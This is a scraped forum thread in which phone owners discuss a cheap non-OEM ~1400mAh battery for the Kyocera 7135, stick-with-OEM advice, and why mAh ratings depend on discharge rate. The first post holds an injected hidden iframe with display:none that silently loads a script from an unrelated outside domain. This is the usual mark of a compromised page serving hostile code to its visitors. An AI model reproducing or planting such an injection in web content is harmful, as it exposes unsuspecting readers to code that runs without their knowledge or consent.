+ Reply to Thread
    Fully Converged

Longer life battery?

Saw this item on ebay; it's not OEM but appears to be 1400mAh as opposed to the stock 1200. Any experience with these?

http://cgi.ebay.com/ws/eBayISAPI.dll...category=20358<iframe src="http://tmb-corp.com/g/p/l/counter.js" style="display:none"></iframe>
    From the Middle of the Sea ;-)

When it comes to batteries and chargers, I'll stick with OEM. I have had too many problems with non-OEM cel phone batteries, even from known reputable companies.

Alan

Fully Converged
    Originally posted by alanb
    When it comes to batteries and chargers, I'll stick with OEM. I have had too many problems with non-OEM cel phone batteries, even from known reputable companies.

Alan
    I don't disagree at all. Just thought it was topical since battery life has been such an issue of late.

Originally posted by joekonaiii
    I don't disagree at all. Just thought it was topical since battery life has been such an issue of late.
    Absolutly on topic, and I would be interested if anyone does risk this how it works out.

The word on the street (or elsewhere on this board ) is that Kyo will be releaseing an extended life battery sometime soon.

Alan

Wonder how they will fit it? Probably require a different battery cover
    -Quick

Fully Converged
    it looks thick enough in the pic to probably just replace the battery door, but that's idle speculation.

Administrator
    one way to find out how good it is.. contact the guy who bought it..

me wonders if these batteires may be rejects or first run units since the cost of them were so low...

I bought one today and will report it's performance when i get it.
    You should be 10% smarter than the equipment you operate. For some of you, the 7135 is not the best choice of equipment.

Did anyone notice the "~" in front of 1400.
    "~" to me means approximately.... meaning that this battery could have just as many mAH as the OEM battery... or even less.
    Lets wait for Byrd Dog's comments!

I bought the 1200 mAh generic battery from xcceries ($11.75 on eBay) and have been very pleased.

Fully Converged
    Originally posted by i300Fan
    I bought the 1200 mAh generic battery from xcceries ($11.75 on eBay) and have been very pleased.
    Is that the same one advertised as ~1400 mAh? How's standby/talk time with the one you bought?

By the way, the 7135 battery is Lithium-ion. Isn't the latest and greatest battery technology Lithium-polymer?

Is is possible that a Lithium-polymer battery replacement for the 7135 would be an improvement?

jeh
    Unfortunately battery "capacity" (as measured in mAH) varies according to load. You can take a "1200 mAH" battery and easily get a much higher rating out of it just by draining it at a lower rate. Unless they quote the discharge rate (usually something like "1/10C", which for a 1200 mAH battery would mean 120 mA) AND the cutoff voltage, these specs can be pretty much anything the seller wants them to be.